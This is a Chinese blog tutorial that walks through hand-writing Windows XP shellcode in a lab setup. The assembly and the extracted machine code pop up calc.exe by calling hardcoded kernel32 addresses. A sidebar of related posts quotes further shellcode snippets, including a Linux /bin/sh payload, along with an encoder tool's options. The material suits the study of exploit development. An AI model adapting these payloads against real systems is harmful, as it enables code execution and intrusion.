shellcode——1、采用硬编码弹出计算器

最新推荐文章于 2024-07-29 18:33:52 发布
最新推荐文章于 2024-07-29 18:33:52 发布
阅读量6.5k 收藏 8
点赞数 2
分类专栏: shellcode
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/alwin_cx/article/details/80373347
版权

一、shellcode的介绍

    用一句话给的shellcode的下个定义,那就是“一段可以执行特定功能的机器码”。

二、实验环境及工具介绍

实验环境:Windows XP SP3

实验工具:OllyDbg、WinHex、LordPE

三、编程思路

     用c语言来描述其实就是两句:

WinExec("calc.exe", 5);
ExitProcess(0);
    看到有些文章会在开头还加一句: 
LoadLibrary(“kernel32.dll”);
    看不懂为啥要加这一句,因为大部分软件都会加载kernel32.dll这个的DLL,更何况LoadLibrary()本来就是在kernel32.dll中的。。。


四、确定被调用函数的虚拟地址

    因为这次是用的是硬编码的方式,所以需要通过查找kernel32.dll的导出表,来确定的的WinExec()和ExitProcess()的虚拟地址。使用LordPE加载kernel32.dll,在导出表中查找这两个函数得出两个函数的RVA(相对虚拟地址)为别为:0x000623AD和0x0001CAFA。

    当然,光有RVA是不够的,还需要知道基址,即0x7C800000。


    所以计算得出了ExitProcess()的地址为0x7C81CAFA,WinExec()的地址为0x7C8623AD。

五、编写汇编代码

int main()
{
	__asm
	{
		push ebp
		mov ebp,esp
		//WinExec("calc.exe", 5)
		xor eax,eax						//eax清0
		push eax						//“0x00”,用于分割字符串
		mov eax,0x6578652e				        //".exe"
		push eax
		mov eax,0x636c6163				        //"calc"
		push eax
		mov eax,esp
		push 5							//arg2=SW_SHOW
		push eax						//arg1="calc.exe"
		mov eax,0x7c8623ad				        //WinExec的地址
		call eax
		//ExitProcess(0)
		xor eax,eax
		push eax						//arg1=0
		mov eax,0x7c81cafa				        //ExitProcess的地址
		call eax			

		mov esp,ebp
		pop ebp
	}
	return 0;
}

测试结果:



六、提取机器码

    用OD加载程序,二进制复制,再粘贴到的的WinHex中。


提取机器码,并测试:

unsigned char shellcode[]=
"/x55/x8B/xEC/x33"
"/xC0/x50/xB8/x2E"
"/x65/x78/x65/x50"
"/xB8/x63/x61/x6C"
"/x63/x50/x8B/xC4"
"/x6A/x05/x50/xB8"
"/xAD/x23/x86/x7C"
"/xFF/xD0/x33/xC0"
"/x50/xB8/xFA/xCA"
"/x81/x7C/xFF/xD0"
"/x8B/xE5/x5D/x33";

int main()
{
	__asm
	{
		lea eax,shellcode
		call eax
	}
	return 0;
}


至此,一段用硬编码的shellcode的就完成了(@ _ @)!

参考链接:https://www.cnblogs.com/toorist/p/4428340.html



alwin_cx
关注
专栏目录
shellcode样本—弹出计算器
谈成(C/C++)
04-28 1813
该样本弹出计算器的原理为: 1)先加载MSVCRT.DLL。 2)再使用system()函数调用calc命令。 该shellcode脚本只在xp下通过实验,仅适合用来研究和验证漏洞。其中的函数地址采用的都是固定地址。win7以上不适用。 该样本特点:没有任何0x00,可以参与字符串类溢出。比如strcpy等。 unsigned char shellcode2[] = "\x55\x8B\xEC\x33\xC0\x50\x50\x50\xC6\x45\xF4\x4D\xC6\x45\xF5\x53"
汇编语言编写shellcode实现计算器
yeanhoo的博客
04-04 1945
使用汇编语言编写shellcode,调用WinExec实现弹出计算器,汇编代码如下: .386 .model flat,stdcall ; 代码区域 .code main: push ebp mov ebp,esp sub esp,20h; 开辟栈空间 ; 获取Kernel32基址 assume fs:nothing mov eax,[fs:30h]; peb结构所在地址 mov ...
shellcode2--弹出计算器
gclome的博客
02-18 2253
// 345.cpp : Defines the entry point for the console application. // #include "stdafx.h" #include "stdio.h" #include "windows.h" char shellcode[]="\x66\x81\xEC\x54\x04\x33\xDB\x53\x68\x2E\x65\x78\x65\...
pwn入门——5.shellcode
最新发布
weixin_62626298的博客
07-29 198
本节只会讲解,因为我觉得,对于入门来说,首先要会用,我们用多了,慢慢就会理解它的涵义,大家也可以去自行找相关资料来了解学习。
c和汇编混合编程----shellcode----弹出计算器
qq_41683305的博客
02-09 1050
先用c和汇编混合编程成功弹出计算器(在VC++里运行) #include "stdio.h" #include "windows.h" int main(int argc, char* argv[]) { printf("begin\n"); HINSTANCE libHandle; char *dll="kernel32.dll"; libHandle=LoadLibrar...
shellcode
snowleopard_bin的博客
08-10 1539
短shuallcode shellcode='\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\xb0\x3b\x0f\x05' 64bit local /bin/sh 有时遇到写的字符中不能包含'\x0b'这个字符,因此不能...
ShellCode01: 弹出计算器
weixin_30399797的博客
04-15 901
简单地讲,ShellCode就是一段01二进制的机器码,试图利用软件中的漏洞完成自己想做的事情。ShellCode的编写需要考虑和顾及的东西很多,这里先写一个适合新手的范例。 *需要的预备知识: 1.汇编语言(尤其要清楚了解函数是如何调用的) 2.PE文件格式(可参考《Windows PE 权威指南》一书) 3.一点点WinAPI函数 *使用的工具软件: 1.MASM32 2....
栈溢出攻击之弹出计算器
Bonjour~
04-15 7742
一.系统栈溢出原理函数栈帧及寄存器在高级语言中,当函数被调用时,系统栈会为这个函数开辟一个新的栈帧,并把它压入栈中。这个栈帧中的内存空间被它所属的函数独占,正常情况下是不会和别的函数共享的。当函数返回时,系统栈会弹出该函数所对应的栈帧。Win32系统提供两个特殊的寄存器用于标识位于系统栈顶端的栈帧: 1. ESP:栈指针寄存器,其内存放着一个指针,该指针永远指向系统栈最上面一个栈帧的栈顶; 2.
ShellCode —— 无线程注入
墨鱼菜鸡
07-26 177
背景 也叫进程内存替换,就是指将一个进程的内存数据清空,写入任意我们想写入的数据,并更改执行顺序,执行我们写入的数据代码。 简单过程就是: 创建一个挂起主线程的进程(也可以直接挂起目标进程,不自己创建)在新进程的地址...
shell语言编写计算器源代码,详细注释
qq_29531077的博客
04-22 296
【代码】用shell语言编写计算器源代码,详细注释。
Shellcode编写
weixin_54452942的博客
04-23 1131
二是ESI寄存器的值自动增加32位,也就是当第一轮执行之后,esi中放的是下一个函数名称的地址,继续将其指向的内存空间的前四个字节送到eax中(也就是函数名称列表中的第一个函数名称的前四个字节),同时esi加4,指向了第二个函数名称的地址,一直向后比对,直到每个字节都比对成功后,此时的ecx中存的就是目标函数在函数名称列表中的位置。这个成员在PEB结构体中的偏移量是0x0C。在32位Windows系统中,FS寄存器指向TEB的起始地址,而在64位Windows系统中,GS寄存器指向TEB的起始地址。
shellcode转换工具
07-26
shellcode转换工具
shellcode帮助工具,直接把exe转shellcode
12-29
Shellcode Helper v1.62 Coded by TeLeMan (c) 2008-2013 Usage: schelper.exe [options] Options: -i [input file] input file (Default: stdin) -o [output file] output file (Default: stdout) -s input file format (Default: Auto-Detection) -sb input file format is Binary -sp the input file format's parameters -d output file format (Default: C format) -db output file format is Binary -dp the output file format's parameters -search get the start offset by the pattern: e.g. PK\x03\x04 -soff fix the match offset after searching (Default: 0) -off convert the input file from the offset (Default: 0) -len convert the input file with the length (Default: 0 - MAX) -en [encoder] encode shellcode (Default: XorDword) -de [encoder] decode shellcode (Default: Auto-Detection) -ex exclude characters: e.g. 0x00,0x01-0x1F,0xFF (Default: 0x00) -in incude characters only -ep the encoder's parameters -t [pid] execute or inject shellcode into process for testing -td [pid] execute or inject shellcode into process for debugging -stack put shellcode into stack and execute it (ESP is the shellcode start) -noinfo display no normal messages except error messages Available formats: 0 - C 1 - C(HexArray) 2 - Perl 3 - Python 4 - Ruby 5 - JavaScript(Escape) 6 - VBScript(Escape) 7 - Pascal 8 - MASM(Data) 9 - HexDump 10 - BitString 11 - HexString 12 - HexArray(C like) 13 - Base64 14 - Binary 15 - HexString(C like) 16 - HexString(Escape) 17 - HexString(JavaScript,UNICODE) 18 - URI(ISO-8859-1) 19 - XML(PCDATA) 20 - BigNumber 21 - BigNumber(Hex) 22 - BigNumber(BaseX) 23 - FloatPoint 24 - UnixTimestamp 25 - GUID 26 - MASM(ASM) 27 - NASM 28 - YASM(ASM) 29 - FASM(ASM) 30 - JWASM(ASM) 31 - POASM(ASM) 32 - GOASM(ASM) 33 - GNU ASM Available encoders:
win7下模拟溢出漏洞利用shellcode弹出计算器
天空下得大海
10-07 3357
win7 溢出漏洞 shellcode 弹出计算器
Shellcode学习代码
小发猫
01-17 1691
#include /*void test(){ // sub esp, 44h int b; int *k=&b; k+=22; (*k) = 88; printf("aaaaaaaaaaaaa %d k = %#0x/n", (*k), k);/* __asm {  mov DWORD PTR [ebp-4], a  mov DWORD PTR [ebp+54h], a }*//* pr
什么是shellcode
qq_44833342的博客
05-29 1054
例如病毒、蠕虫、木马等。一旦成功执行,Shellcode可以允许攻击者执行任意操作,例如获取系统权限、窃取敏感数据、修改文件、控制网络连接等。Shellcode是一段二进制代码,通常用于利用计算机系统中的漏洞,以便攻击者能够在系统上执行任意代码。Shellcode通常是以二进制形式编写的,因此可以直接在内存中执行。Shellcode通常被嵌入到攻击者设计的恶意软件中。,而不需要先将其编译成可执行文件。
十七、Shellcode编码
wanhex的博客
03-10 3261
在很多的漏洞利用场景中,Shellcode的内容会受到限制,这种限制不仅来自存在漏洞的软件自身,在某些情况下,也来自一些基于特征的IDS(网络入侵检测系统)系统。我们先来看看Shellcode会受到哪些限制。 首先,所有的字符串处理函数都会对NULL字节进行限制,通常我们会选择对Shellcode指令进行优化以避免在Shellcode中直接出现NULL字节。 其次,在某些处理流程中可能会限制0x0...
3.6 shellcode编码技术
qq_55202378的博客
08-03 1060
编码技术
两种ShellCode
Bill
02-16 398
两种ShellCode 1. 第一种 \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80 对应的汇编代码: section .text global _start _start: push eax push 0x6873...
修复dll shellcode 硬编码
09-11
修复DLL中的shellcode硬编码的方法有以下几个步骤: 1. 通过特殊处理,使用正常的方式编写DLL,实现shellcode的效果。这可以通过修改dos头,在其中填入精心构造的bootstrap shellcode来实现。这样处理之后,DLL已经初步具备了shellcode的特征,可以像shellcode一样被执行了。 2. 实现ReflectiveLoader函数。这个函数的作用是将DLL映射到内存中,并解析其中的导出函数和导入函数,使得DLL能够像普通的shellcode一样被执行。 3. 完成以上两项之后,DLL就可以调用任意API和自己编写的函数,从而实现与普通shellcode相同的功能。不过需要注意的是,由于DLL的体积较大,相比于shellcode注入,更容易被检测。 总结起来,修复DLL中的shellcode硬编码可以通过特殊处理和实现ReflectiveLoader函数来实现。这样修复后的DLL可以像普通的shellcode一样被执行,并且具备更多的功能和灵活性。但需要注意的是,由于DLL的体积较大,相比于shellcode注入,更容易被检测。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值